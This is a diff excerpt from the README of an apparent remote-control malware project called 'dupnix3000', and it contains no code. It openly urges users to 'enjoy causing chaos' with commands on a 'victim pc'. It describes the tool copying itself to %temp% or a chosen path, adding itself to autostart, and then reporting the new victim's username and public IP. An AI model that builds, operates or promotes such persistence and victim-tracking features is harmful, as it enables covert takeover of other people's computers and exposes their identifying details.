vende11s/dupnix3000/README.md

 * enjoy causing chaos, use your [commands](#commands) on victim pc

 ### Autostart
+* enter your path to features.cpp -> PATH
-* if you have turned it on you can put your executable whenever you want, it will automaticly copy it self to %temp% and add to autostart
+* if you have turned it on you can put your executable whenever you want, it will automaticly copy it self to  your path and add to autostart
 * after that it will send info about new user, username and public ip

 ### Commands